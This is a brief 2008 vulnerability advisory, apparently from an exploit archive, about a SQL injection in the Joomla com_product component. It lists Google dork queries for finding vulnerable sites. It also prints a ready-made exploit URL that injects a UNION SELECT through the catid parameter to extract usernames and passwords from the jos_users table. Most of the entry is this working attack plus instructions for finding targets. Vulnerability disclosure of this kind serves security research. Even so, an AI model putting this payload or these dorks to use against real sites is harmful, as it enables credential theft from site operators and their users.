joomla com_product SQL Injection(catid)

2008-02-24T00:00:00
ID SECURITYVULNS:DOC:19252
Type securityvulns
Reporter Securityvulns
Modified 2008-02-24T00:00:00

Description

joomla com_product SQL Injection(catid)

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : hackturkiye.hackturkiye@gmail.com

DORK 1 : allinurl:"com_product"catid)

DORK 2 : allinurl:

EXPLOIT : index.php?option=com_product&Itemid=S@BUN&task=viewlist&catid=-9999999//union//select//username,1,2,3,password,5,6,7,8,9//from/*/jos_users/

S@BUN i AM NOT HACKER S@BUN